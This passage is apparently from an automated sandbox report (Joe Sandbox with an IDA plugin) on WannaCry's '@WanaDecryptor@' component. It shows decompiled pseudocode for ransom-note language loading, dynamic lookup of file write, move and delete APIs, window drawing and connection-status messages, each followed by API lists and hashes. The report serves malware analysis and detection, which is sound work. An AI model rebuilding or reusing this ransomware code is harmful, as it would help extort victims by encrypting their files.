                                                      					_push("msg\\");
                                                      					L00412CAA();
                                                      					_push("m_%s.wnry");
                                                      					_push(_t30);
                                                      					_t32 =  &_v300;
                                                      					_v28 = 2;
                                                      					_push(_t32);
                                                      					L00412CCE();
                                                      					sprintf( &_v308,  *_t32, "English");
                                                      					_t60 = _t60 + 0xc;
                                                      					L00412CC2();
                                                      					_v40 = 0;
                                                      					L00412CC2();
                                                      				}
                                                      				_t31 = E00406CF0(_t56,  &_v292);
                                                      				_v28 = 0xffffffff;
                                                      				L00412CC2();
                                                      				 *[fs:0x0] = _v36;
                                                      				return _t31;
                                                      			}



























                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #800$#537#924sprintf$#3874#540AttributesFile
                                                      • String ID: English$m_%s.wnry$msg\
                                                      • API String ID: 3713669620-4206458537
                                                      • Opcode ID: f36c2dcfbfc0b931c038135b008570d0ce4cdd6941e9a910e96e45ef17743a79
                                                      • Instruction ID: 3ad7a17867ea9436e9d42ea8b12d154e8c58dea708134770199309aae3637b36
                                                      • Opcode Fuzzy Hash: f36c2dcfbfc0b931c038135b008570d0ce4cdd6941e9a910e96e45ef17743a79
                                                      • Instruction Fuzzy Hash: 4A316170108341AEC324EB25D941FDE77A4BBA8714F404E1EF59AC32D1EB789558CAA7
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E00402C40() {
                                                      				_Unknown_base(*)()* _t11;
                                                      				struct HINSTANCE__* _t23;
                                                      
                                                      				if(E00404B70() == 0) {
                                                      					L12:
                                                      					return 0;
                                                      				} else {
                                                      					if( *0x4217a0 == 0) {
                                                      						_t23 = LoadLibraryA("kernel32.dll");
                                                      						if(_t23 == 0) {
                                                      							goto L12;
                                                      						} else {
                                                      							 *0x4217a0 = GetProcAddress(_t23, "CreateFileW");
                                                      							 *0x4217a4 = GetProcAddress(_t23, "WriteFile");
                                                      							 *0x4217a8 = GetProcAddress(_t23, "ReadFile");
                                                      							 *0x4217ac = GetProcAddress(_t23, "MoveFileW");
                                                      							 *0x4217b0 = GetProcAddress(_t23, "MoveFileExW");
                                                      							 *0x4217b4 = GetProcAddress(_t23, "DeleteFileW");
                                                      							_t11 = GetProcAddress(_t23, "CloseHandle");
                                                      							 *0x4217b8 = _t11;
                                                      							if( *0x4217a0 == 0 ||  *0x4217a4 == 0 ||  *0x4217a8 == 0 ||  *0x4217ac == 0 ||  *0x4217b0 == 0 ||  *0x4217b4 == 0 || _t11 == 0) {
                                                      								goto L12;
                                                      							} else {
                                                      								return 1;
                                                      							}
                                                      						}
                                                      					} else {
                                                      						return 1;
                                                      					}
                                                      				}
                                                      			}






                                                      APIs
                                                      • LoadLibraryA.KERNEL32(kernel32.dll), ref: 00402C63
                                                      • GetProcAddress.KERNEL32(00000000,CreateFileW), ref: 00402C80
                                                      • GetProcAddress.KERNEL32(00000000,WriteFile), ref: 00402C8D
                                                      • GetProcAddress.KERNEL32(00000000,ReadFile), ref: 00402C9A
                                                      • GetProcAddress.KERNEL32(00000000,MoveFileW), ref: 00402CA7
                                                      • GetProcAddress.KERNEL32(00000000,MoveFileExW), ref: 00402CB4
                                                      • GetProcAddress.KERNEL32(00000000,DeleteFileW), ref: 00402CC1
                                                      • GetProcAddress.KERNEL32(00000000,CloseHandle), ref: 00402CCE
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AddressProc$LibraryLoad
                                                      • String ID: CloseHandle$CreateFileW$DeleteFileW$MoveFileExW$MoveFileW$ReadFile$WriteFile$kernel32.dll
                                                      • API String ID: 2238633743-1294736154
                                                      • Opcode ID: 468b1d099fd8a0684a95be66b91aae829347793d9c58d8a41e664e10bf98f029
                                                      • Instruction ID: a2b5d8bb757b14b28e15fb80ad1863100e1319e91a413c2d323d0fcc62a15203
                                                      • Opcode Fuzzy Hash: 468b1d099fd8a0684a95be66b91aae829347793d9c58d8a41e664e10bf98f029
                                                      • Instruction Fuzzy Hash: AA110334B423216BD734AB25BD58FA72695EFD4701795003FA801E76E1D7B89C42CA5C
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 78%
                                                      			E00405580(void* __ecx) {
                                                      				int _v8;
                                                      				intOrPtr _v12;
                                                      				char _v28;
                                                      				char _v80;
                                                      				void* _v96;
                                                      				struct tagRECT _v112;
                                                      				signed int _v116;
                                                      				void* _v120;
                                                      				struct HDC__* _v140;
                                                      				long _v144;
                                                      				struct tagRECT _v160;
                                                      				char _v164;
                                                      				void* _v172;
                                                      				intOrPtr _v176;
                                                      				char _v188;
                                                      				int _v192;
                                                      				int _v196;
                                                      				int _v204;
                                                      				intOrPtr _v212;
                                                      				void* _v216;
                                                      				struct HBRUSH__* _v220;
                                                      				char _v224;
                                                      				intOrPtr _v228;
                                                      				void* _v244;
                                                      				intOrPtr _v248;
                                                      				intOrPtr _v252;
                                                      				signed int _v256;
                                                      				void* _v260;
                                                      				void* _v264;
                                                      				void* _v268;
                                                      				int _v272;
                                                      				intOrPtr _v296;
                                                      				intOrPtr _v300;
                                                      				intOrPtr _v304;
                                                      				int _t78;
                                                      				long _t79;
                                                      				struct HBRUSH__* _t80;
                                                      				struct HDC__* _t84;
                                                      				char _t85;
                                                      				struct HBRUSH__* _t86;
                                                      				intOrPtr _t89;
                                                      				intOrPtr _t90;
                                                      				intOrPtr _t102;
                                                      				intOrPtr _t104;
                                                      				intOrPtr _t108;
                                                      				intOrPtr _t136;
                                                      				void* _t151;
                                                      				struct HBRUSH__* _t152;
                                                      				void* _t153;
                                                      				void* _t156;
                                                      				int _t160;
                                                      				intOrPtr _t162;
                                                      
                                                      				_push(0xffffffff);
                                                      				_push(E00413943);
                                                      				_push( *[fs:0x0]);
                                                      				 *[fs:0x0] = _t162;
                                                      				_t156 = __ecx;
                                                      				_t78 = GetClientRect( *(__ecx + 0x20),  &_v112);
                                                      				_t160 = 0;
                                                      				_v204 = 0;
                                                      				_t108 =  *((intOrPtr*)( *((intOrPtr*)(_t156 + 0x44)) - 8));
                                                      				_v176 = _t108;
                                                      				if(_t108 != 0) {
                                                      					L00412DD0();
                                                      					_t79 =  *(_t156 + 0x50);
                                                      					_v8 = 0;
                                                      					_v164 = 0xffb53f;
                                                      					_v160.left = _t79;
                                                      					_v160.top = 0x674017;
                                                      					_v160.right =  *((intOrPtr*)(_t156 + 0x4c));
                                                      					_v160.bottom = 0;
                                                      					_v144 =  *(_t156 + 0x54);
                                                      					L00412E5A();
                                                      					_t80 =  *((intOrPtr*)(_t79 + 8));
                                                      					__imp__#8(_t80,  *((intOrPtr*)(_t156 + 0x58)), 0,  &_v164, 3, _t156, _t151);
                                                      					_t152 = _t80;
                                                      					_v220 = _t152;
                                                      					L00412E54();
                                                      					asm("sbb eax, eax");
                                                      					_v28 = 1;
                                                      					_t84 = CreateCompatibleDC( ~( &_v120) & _v116);
                                                      					_push(_t84);
                                                      					L00412E4E();
                                                      					_push(_t152);
                                                      					L00412DE2();
                                                      					if(_t84 != 0) {
                                                      						_t84 =  *(_t84 + 4);
                                                      					}
                                                      					_push(_t84);
                                                      					_t85 = _v224;
                                                      					_push(_t85);
                                                      					L00412E48();
                                                      					_v212 = _t85;
                                                      					_t153 = 0;
                                                      					_v252 = 1;
                                                      					_t86 = CreateSolidBrush( *(_t156 + 0x54));
                                                      					_v220 = _t86;
                                                      					FillRect(_v140,  &_v160, _t86);
                                                      					_t89 = 0;
                                                      					_v260 = 0;
                                                      					if(_t108 > 0) {
                                                      						do {
                                                      							_v224 =  *((intOrPtr*)( *((intOrPtr*)(_t156 + 0x44)) + _t89));
                                                      							E00405110(_t156,  &_v188, _v224);
                                                      							asm("sbb eax, eax");
                                                      							BitBlt(_v160, _t160, _v272,  *((intOrPtr*)(_t156 + 0x60)) +  *((intOrPtr*)(_t156 + 0x68)),  *((intOrPtr*)(_t156 + 0x64)) +  *((intOrPtr*)(_t156 + 0x6c)),  ~( &_v260) & _v256, _v196, _v192, 0xcc0020);
                                                      							_t102 =  *((intOrPtr*)(_t156 + 0x74));
                                                      							_t160 = _t160 +  *((intOrPtr*)(_t156 + 0x60)) +  *((intOrPtr*)(_t156 + 0x68));
                                                      							_t153 = _t153 + 1;
                                                      							if(_t153 != _t102) {
                                                      								goto L10;
                                                      							} else {
                                                      								_t136 =  *((intOrPtr*)(_t156 + 0x70));
                                                      								if(_t136 != 1) {
                                                      									if(_t153 != _t102) {
                                                      										goto L10;
                                                      									} else {
                                                      										_t104 = _t136;
                                                      										if(_t104 <= 1) {
                                                      											goto L10;
                                                      										} else {
                                                      											if(_v304 != _t104) {
                                                      												_t153 = 0;
                                                      												_t160 = 0;
                                                      												_v300 = _v300 +  *((intOrPtr*)(_t156 + 0x64)) +  *((intOrPtr*)(_t156 + 0x6c));
                                                      												_v304 = _v304 + 1;
                                                      												goto L10;
                                                      											}
                                                      										}
                                                      									}
                                                      								}
                                                      							}
                                                      							goto L11;
                                                      							L10:
                                                      							_t89 = _v296 + 1;
                                                      							_v296 = _t89;
                                                      						} while (_t89 < _v272);
                                                      					}
                                                      					L11:
                                                      					_t90 = _v228;
                                                      					if(_t90 != 0) {
                                                      						_t90 =  *((intOrPtr*)(_t90 + 4));
                                                      					}
                                                      					_push(_t90);
                                                      					_push(_v248);
                                                      					L00412E48();
                                                      					L00412E42();
                                                      					DeleteObject(_v264);
                                                      					_t78 = DeleteObject(_v244);
                                                      					_v80 = 0;
                                                      					L00412E3C();
                                                      					_v80 = 0xffffffff;
                                                      					L00412DB8();
                                                      				}
                                                      				 *[fs:0x0] = _v12;
                                                      				return _t78;
                                                      			}


                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #5785CreateDeleteObjectRect$#1168#1640#2405#2860#323#470#640#755BrushClientCompatibleFillSolid
                                                      • String ID:
                                                      • API String ID: 1233696098-0
                                                      • Opcode ID: 3787f29b2f3b6759b14921245bb0c5350f6533f71f74a9e78965702df0d7f065
                                                      • Instruction ID: b627e9c1237585dd637a27707791d59f98fdace04f8481d3914a5fbe5096edf5
                                                      • Opcode Fuzzy Hash: 3787f29b2f3b6759b14921245bb0c5350f6533f71f74a9e78965702df0d7f065
                                                      • Instruction Fuzzy Hash: 057135716087419FC324DF69C984AABB7E9FB88704F004A2EF59AC3350DB74E845CB66
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 75%
                                                      			E00408D70(intOrPtr __ecx, signed long long __fp0, intOrPtr* _a4, int _a8, signed int _a12, unsigned int _a16, signed int _a20) {
                                                      				intOrPtr _v0;
                                                      				unsigned int _v4;
                                                      				unsigned int _v8;
                                                      				unsigned int _v12;
                                                      				intOrPtr _v20;
                                                      				char _v36;
                                                      				intOrPtr _v56;
                                                      				char _v60;
                                                      				intOrPtr _v64;
                                                      				char _v68;
                                                      				unsigned int _v72;
                                                      				signed int _v76;
                                                      				signed int _v80;
                                                      				intOrPtr _v84;
                                                      				signed int _v88;
                                                      				signed int _v92;
                                                      				signed int _v96;
                                                      				signed long long _v100;
                                                      				intOrPtr _v104;
                                                      				void* _v108;
                                                      				void* _v112;
                                                      				void* _v120;
                                                      				unsigned int _t93;
                                                      				signed int _t96;
                                                      				signed int _t100;
                                                      				unsigned int _t102;
                                                      				signed int _t107;
                                                      				int _t112;
                                                      				char _t113;
                                                      				signed char _t115;
                                                      				RECT* _t122;
                                                      				signed int _t125;
                                                      				signed int _t134;
                                                      				intOrPtr* _t135;
                                                      				unsigned int _t138;
                                                      				signed int _t140;
                                                      				signed int _t143;
                                                      				intOrPtr* _t146;
                                                      				char _t151;
                                                      				char _t152;
                                                      				signed int _t169;
                                                      				intOrPtr* _t177;
                                                      				signed int _t192;
                                                      				intOrPtr* _t193;
                                                      				intOrPtr _t195;
                                                      				unsigned int _t202;
                                                      				char _t209;
                                                      				intOrPtr _t210;
                                                      				signed long long _t228;
                                                      				signed long long _t229;
                                                      				signed long long _t230;
                                                      				signed long long _t231;
                                                      				signed long long _t234;
                                                      
                                                      				_t228 = __fp0;
                                                      				_push(0xffffffff);
                                                      				_push(E004140A0);
                                                      				_push( *[fs:0x0]);
                                                      				 *[fs:0x0] = _t210;
                                                      				_t93 = _a20;
                                                      				_v104 = __ecx;
                                                      				_t138 = _a16;
                                                      				_t169 = _t138 & 0x000000ff;
                                                      				_v76 = _t169;
                                                      				_t192 = (_t93 & 0x000000ff) - _t169;
                                                      				_t140 = _t138 >> 0x00000010 & 0x000000ff;
                                                      				_t96 = (_t93 >> 0x00000010 & 0x000000ff) - _t140;
                                                      				_v88 = 0;
                                                      				_v96 = _t96;
                                                      				_v92 = _t140;
                                                      				asm("cdq");
                                                      				_t143 = _t96 ^ 0;
                                                      				_v100 = 0;
                                                      				asm("cdq");
                                                      				_a20 = _t192;
                                                      				_t134 = 0;
                                                      				if(0 <= _t143) {
                                                      					_t134 = _t143;
                                                      				}
                                                      				asm("cdq");
                                                      				_t100 = _t192 ^ 0;
                                                      				if(_t100 <= _t134) {
                                                      					_a16 = 0;
                                                      					if(0 <= _t143) {
                                                      						_a16 = _t143;
                                                      					}
                                                      				} else {
                                                      					_a16 = _t100;
                                                      				}
                                                      				_t193 = _a8;
                                                      				_t102 =  *((intOrPtr*)(_t193 + 8)) -  *_t193;
                                                      				if(_t102 < _a16) {
                                                      					_a16 = _t102;
                                                      				}
                                                      				if(_a16 == 0) {
                                                      					_a16 = 1;
                                                      				}
                                                      				asm("fild dword [esp+0x88]");
                                                      				asm("fild dword [esp+0x8c]");
                                                      				_t135 = _a4;
                                                      				_t229 = _t228 / st1;
                                                      				_v80 = _t229;
                                                      				asm("fild dword [esp+0x1c]");
                                                      				_t230 = _t229 / st1;
                                                      				_v100 = _t230;
                                                      				asm("fild dword [esp+0x20]");
                                                      				_t231 = _t230 / st1;
                                                      				_v96 = _t231;
                                                      				st0 = _t231;
                                                      				_t107 = GetDeviceCaps( *( *_t135 + 8), 0x26) & 0x00000100;
                                                      				_v80 = _t107;
                                                      				if(_t107 == 0 && _a8 > 1) {
                                                      					_t125 = GetDeviceCaps( *( *_t135 + 8), 0xc);
                                                      					if(GetDeviceCaps( *( *_t135 + 8), 0xe) * _t125 < 8) {
                                                      						_v8 = 1;
                                                      					}
                                                      				}
                                                      				_t146 = _t193;
                                                      				_a12 =  *((intOrPtr*)(_t193 + 8)) -  *_t193;
                                                      				_t202 = 0;
                                                      				asm("fild dword [esp+0x8c]");
                                                      				_v72 = 0;
                                                      				_v68 =  *_t146;
                                                      				_v76 = 0x415a44;
                                                      				asm("fidiv dword [esp+0x88]");
                                                      				_v64 =  *((intOrPtr*)(_t146 + 4));
                                                      				_v60 =  *((intOrPtr*)(_t146 + 8));
                                                      				_v56 =  *((intOrPtr*)(_t146 + 0xc));
                                                      				_a12 = _t231;
                                                      				_t112 = _a8;
                                                      				_v12 = 0;
                                                      				_v4 = 0;
                                                      				if(_t112 <= 0) {
                                                      					L31:
                                                      					_v76 = 0x415c00;
                                                      					_v12 = 1;
                                                      					L00412D52();
                                                      					 *[fs:0x0] = _v20;
                                                      					return _t112;
                                                      				} else {
                                                      					while(1) {
                                                      						asm("fild dword [esp+0x7c]");
                                                      						_t195 =  *_t193;
                                                      						L0041304A();
                                                      						_t46 = _t202 + 1; // 0x1
                                                      						_v4 = _t46;
                                                      						_t209 = _t112 + _t195;
                                                      						asm("fild dword [esp+0x7c]");
                                                      						_v68 = _t209;
                                                      						_t234 = st0 * _a12 * _a12;
                                                      						L0041304A();
                                                      						_t113 = _t112 + _t195;
                                                      						_v60 = _t113;
                                                      						if(_t202 == _a8 - 1) {
                                                      							_t113 =  *((intOrPtr*)(_v0 + 8));
                                                      							_v60 = _t113;
                                                      						}
                                                      						_t177 = _a4;
                                                      						_t151 =  *_t177;
                                                      						if(_t113 < _t151) {
                                                      							goto L29;
                                                      						}
                                                      						if(_t209 < _t151) {
                                                      							_v68 = _t151;
                                                      						}
                                                      						_t152 =  *((intOrPtr*)(_t177 + 8));
                                                      						if(_t113 > _t152) {
                                                      							_v60 = _t152;
                                                      						}
                                                      						L0041304A();
                                                      						_v92 = 0;
                                                      						L0041304A();
                                                      						_t115 = _t113 + _v100 + _v96;
                                                      						_v92 = _t115 << 8;
                                                      						L0041304A();
                                                      						_push(_t115 + _v84 & 0x000000ff | _v92);
                                                      						if(_v80 == 0) {
                                                      							_t112 = E00409D40( &_v36, _t135,  &_v68);
                                                      							_push(_t112);
                                                      							L00412FF2();
                                                      						} else {
                                                      							_push(CreateSolidBrush());
                                                      							L00412D5E();
                                                      							_t122 = E00409D40( &_v60, _t135,  &_v76);
                                                      							_t76 =  &_v96; // 0x415a44
                                                      							asm("sbb ecx, ecx");
                                                      							_t112 = FillRect( *( *_t135 + 4), _t122,  ~_t76 & _v92);
                                                      							L00412D52();
                                                      						}
                                                      						if(_v68 <  *((intOrPtr*)(_v4 + 8))) {
                                                      							L30:
                                                      							_t202 = _v4;
                                                      							_t112 = _a8;
                                                      							_v4 = _t202;
                                                      							if(_t202 < _t112) {
                                                      								_t193 = _v0;
                                                      								continue;
                                                      							}
                                                      						}
                                                      						goto L31;
                                                      						L29:
                                                      						st0 = _t234;
                                                      						goto L30;
                                                      					}
                                                      				}
                                                      			}


                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _ftol$CapsDevice$#2414$#1641#2754BrushCreateFillRectSolid
                                                      • String ID: DZA
                                                      • API String ID: 2487345631-3378329814
                                                      • Opcode ID: 46f8ac59b565287c612820a18e91b1c7afa6038287a955736cfc91f47d65fae1
                                                      • Instruction ID: dda82c2241e8f2351b86cfb5efeedf8da928c70a362fdc9ee550b763b14e0e54
                                                      • Opcode Fuzzy Hash: 46f8ac59b565287c612820a18e91b1c7afa6038287a955736cfc91f47d65fae1
                                                      • Instruction Fuzzy Hash: 2CA147716087418FC324DF25C984AAABBE1FFC8704F148A2EF599D7291DA39D845CF86
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 65%
                                                      			E00401600(void* __ecx, intOrPtr _a4, long _a8, intOrPtr _a12) {
                                                      				void* _t19;
                                                      				long _t21;
                                                      				long _t24;
                                                      				void* _t25;
                                                      				void* _t26;
                                                      				intOrPtr _t27;
                                                      				long _t48;
                                                      				void* _t49;
                                                      				intOrPtr _t50;
                                                      
                                                      				_t27 = _a4;
                                                      				_t48 = _a8;
                                                      				_t19 = _t27 - 0x4e20;
                                                      				_t49 = __ecx;
                                                      				if(_t19 == 0) {
                                                      					if(_t48 != 0) {
                                                      						if(_t48 == 0xffffffff) {
                                                      							goto L14;
                                                      						}
                                                      						goto L15;
                                                      					} else {
                                                      						_push(__ecx);
                                                      						_a4 = _t50;
                                                      						L00412CAA();
                                                      						E00401970("Connected");
                                                      						_t21 = SendMessageA( *(_t49 + 0x80), 0x402, 0x1e, _t48);
                                                      						_push(_a4);
                                                      						_push(_t48);
                                                      						_push(_t27);
                                                      						 *(_t49 + 0xb0) = 0x23;
                                                      						L00412BAE();
                                                      						return _t21;
                                                      					}
                                                      				} else {
                                                      					_t19 = _t19 - 1;
                                                      					if(_t19 == 0) {
                                                      						if(_t48 != 0) {
                                                      							goto L9;
                                                      						} else {
                                                      							_push(__ecx);
                                                      							_a4 = _t50;
                                                      							L00412CAA();
                                                      							E00401970("Sent request");
                                                      							_t24 = SendMessageA( *(_t49 + 0x80), 0x402, 0x23, _t48);
                                                      							_push(_a4);
                                                      							_push(_t48);
                                                      							_push(_t27);
                                                      							 *(_t49 + 0xb0) = 0x28;
                                                      							L00412BAE();
                                                      							return _t24;
                                                      						}
                                                      					} else {
                                                      						_t19 = _t19 - 1;
                                                      						if(_t19 != 0) {
                                                      							L15:
                                                      							_push(_a12);
                                                      							_push(_t48);
                                                      							_push(_t27);
                                                      							L00412BAE();
                                                      							return _t19;
                                                      						} else {
                                                      							if(_t48 != 0) {
                                                      								if(_t48 != 1) {
                                                      									L9:
                                                      									if(_t48 == 0xffffffff) {
                                                      										L14:
                                                      										 *((intOrPtr*)(_t49 + 0xa8)) = 0xffffffff;
                                                      									}
                                                      									goto L15;
                                                      								} else {
                                                      									_push(__ecx);
                                                      									_a4 = _t50;
                                                      									L00412CAA();
                                                      									_t25 = E00401970("Succeed");
                                                      									_push(_a4);
                                                      									_push(_t48);
                                                      									_push(_t27);
                                                      									L00412BAE();
                                                      									return _t25;
                                                      								}
                                                      							} else {
                                                      								_push(__ecx);
                                                      								_a4 = _t50;
                                                      								L00412CAA();
                                                      								_t26 = E00401970("Received response");
                                                      								_push(_a4);
                                                      								_push(_t48);
                                                      								_push(_t27);
                                                      								 *((intOrPtr*)(_t49 + 0xa8)) = 1;
                                                      								L00412BAE();
                                                      								return _t26;
                                                      							}
                                                      						}
                                                      					}
                                                      				}
                                                      			}


                                                      APIs
                                                      • #2385.MFC42 ref: 00401653
                                                      • #537.MFC42(Received response), ref: 00401634
                                                        • Part of subcall function 00401970: #3092.MFC42(00000406,?,00000000,004134D8,000000FF,00401199,Connecting to server...), ref: 00401997
                                                        • Part of subcall function 00401970: #6199.MFC42(00000406,?,00000000,004134D8,000000FF,00401199,Connecting to server...), ref: 0040199E
                                                        • Part of subcall function 00401970: #800.MFC42(00000406,?,00000000,004134D8,000000FF,00401199,Connecting to server...), ref: 004019AF
                                                      • #537.MFC42(Succeed), ref: 0040166F
                                                      • #2385.MFC42(?,?,?,Succeed), ref: 00401684
                                                      • #537.MFC42(Sent request), ref: 0040169F
                                                      • SendMessageA.USER32(?,00000402,00000023,?), ref: 004016BA
                                                      • #2385.MFC42 ref: 004016D3
                                                      • #537.MFC42(Connected), ref: 004016F5
                                                      • SendMessageA.USER32(?,00000402,0000001E,?), ref: 00401710
                                                      • #2385.MFC42 ref: 00401729
                                                      • #2385.MFC42(?,?,?), ref: 0040174C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #2385$#537$MessageSend$#3092#6199#800
                                                      • String ID: Connected$Received response$Sent request$Succeed
                                                      • API String ID: 3790904636-3692714192
                                                      • Opcode ID: 77cbd13b205d5b60acded2d534e2f67ef19f14b7a7dcd1ce5799653af05fca91
                                                      • Instruction ID: e9690c31fbc1831b63af9a5cc079f352e9ea826ed21b4fe1124c0ccffc889961
                                                      • Opcode Fuzzy Hash: 77cbd13b205d5b60acded2d534e2f67ef19f14b7a7dcd1ce5799653af05fca91
                                                      • Instruction Fuzzy Hash: A631E8B130430067C5209F1AD959EAF7B69EBD4BB4F10852FF149A33D1CA795C4582FA
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 78%
                                                      			E00404DD0(void* __ecx) {
                                                      				intOrPtr _t12;
                                                      				long _t13;
                                                      				struct HFONT__* _t15;
                                                      				long _t16;
                                                      				long _t17;
                                                      				int _t29;
                                                      				int _t32;
                                                      				int _t35;
                                                      
                                                      				L00412CB0();
                                                      				_t12 =  *0x42189c; // 0x0
                                                      				_t13 =  *(_t12 + 0x824);
                                                      				 *(__ecx + 0x6c) = _t13;
                                                      				_push(CreateSolidBrush(_t13));
                                                      				L00412D5E();
                                                      				_t35 = __ecx + 0x70;
                                                      				_t15 = CreateFontA(0x10, 0, 0, 0, 0x2bc, 0, 0, 0, 0, 0, 0, 0, 0x20, "Arial");
                                                      				_push(_t15);
                                                      				L00412D5E();
                                                      				_push(0x403);
                                                      				L00412CE6();
                                                      				if(_t35 != 0) {
                                                      					_t29 =  *(_t35 + 4);
                                                      				} else {
                                                      					_t29 = 0;
                                                      				}
                                                      				_t16 = SendMessageA( *(_t15 + 0x20), 0x30, _t29, 1);
                                                      				_push(1);
                                                      				L00412CE6();
                                                      				if(_t35 != 0) {
                                                      					_t32 =  *(_t35 + 4);
                                                      				} else {
                                                      					_t32 = 0;
                                                      				}
                                                      				_t17 = SendMessageA( *(_t16 + 0x20), 0x30, _t32, 1);
                                                      				_push(2);
                                                      				L00412CE6();
                                                      				if(_t35 != 0) {
                                                      					SendMessageA( *(_t17 + 0x20), 0x30,  *(_t35 + 4), 1);
                                                      					return 1;
                                                      				} else {
                                                      					SendMessageA( *(_t17 + 0x20), 0x30, _t35, 1);
                                                      					return 1;
                                                      				}
                                                      			}

                                                      APIs
                                                      • #4710.MFC42 ref: 00404DD5
                                                      • CreateSolidBrush.GDI32(?), ref: 00404DE9
                                                      • #1641.MFC42(00000000), ref: 00404DF3
                                                      • CreateFontA.GDI32(00000010,00000000,00000000,00000000,000002BC,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000020,Arial), ref: 00404E1D
                                                      • #1641.MFC42(00000000), ref: 00404E26
                                                      • #3092.MFC42(00000403,00000000), ref: 00404E32
                                                      • SendMessageA.USER32(?,00000030,?,00000001), ref: 00404E51
                                                      • #3092.MFC42(00000001), ref: 00404E57
                                                      • SendMessageA.USER32(?,00000030,?,00000001), ref: 00404E70
                                                      • #3092.MFC42(00000002), ref: 00404E76
                                                      • SendMessageA.USER32(?,00000030,?,00000001), ref: 00404E88
                                                      • SendMessageA.USER32(?,00000030,?,00000001), ref: 00404E9F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
